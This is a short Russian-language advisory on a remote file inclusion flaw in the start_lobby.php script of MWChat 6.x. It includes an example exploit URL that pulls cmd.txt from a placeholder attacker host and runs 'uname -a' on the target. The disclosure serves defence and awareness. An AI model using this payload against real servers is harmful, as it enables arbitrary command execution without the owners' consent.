Программа: MWChat 6.x

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре ‘$CONFIG[MWCHAT_Libs]’
сценария ‘start_lobby.php’. Удаленный пользователь
может с помощью специально сформированного
URL выполнить произвольный PHP сценарий на
целевой системе с привилегиями web сервера.

Пример:

http://[target]/mwchat/libs/start_lobby.php?CONFIG [MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=u
name%20-a



Оставить мнение